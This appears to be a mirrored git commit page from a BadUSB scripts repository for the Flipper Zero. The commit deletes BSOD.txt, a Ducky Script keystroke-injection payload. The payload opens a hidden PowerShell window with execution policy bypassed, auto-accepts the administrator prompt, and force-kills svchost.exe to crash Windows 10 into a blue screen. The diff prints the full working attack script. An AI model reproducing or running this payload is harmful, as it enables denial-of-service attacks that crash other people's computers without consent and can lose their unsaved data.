mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-01-03 00:10:06 -08:00
Delete BSOD.txt
This commit is contained in:
21
BSOD.txt
21
BSOD.txt
@@ -1,21 +0,0 @@
|
||||
REM Title: Invoke BSOD
|
||||
REM Author: @beigeworm
|
||||
REM Description: This will open powershell and cause a blue screen.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM ***This is a dangerous script - Be Careful!!!***
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window)
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
|
||||
STRING taskkill /f /im svchost.exe
|
||||
ENTER
|
||||
Reference in New Issue
Block a user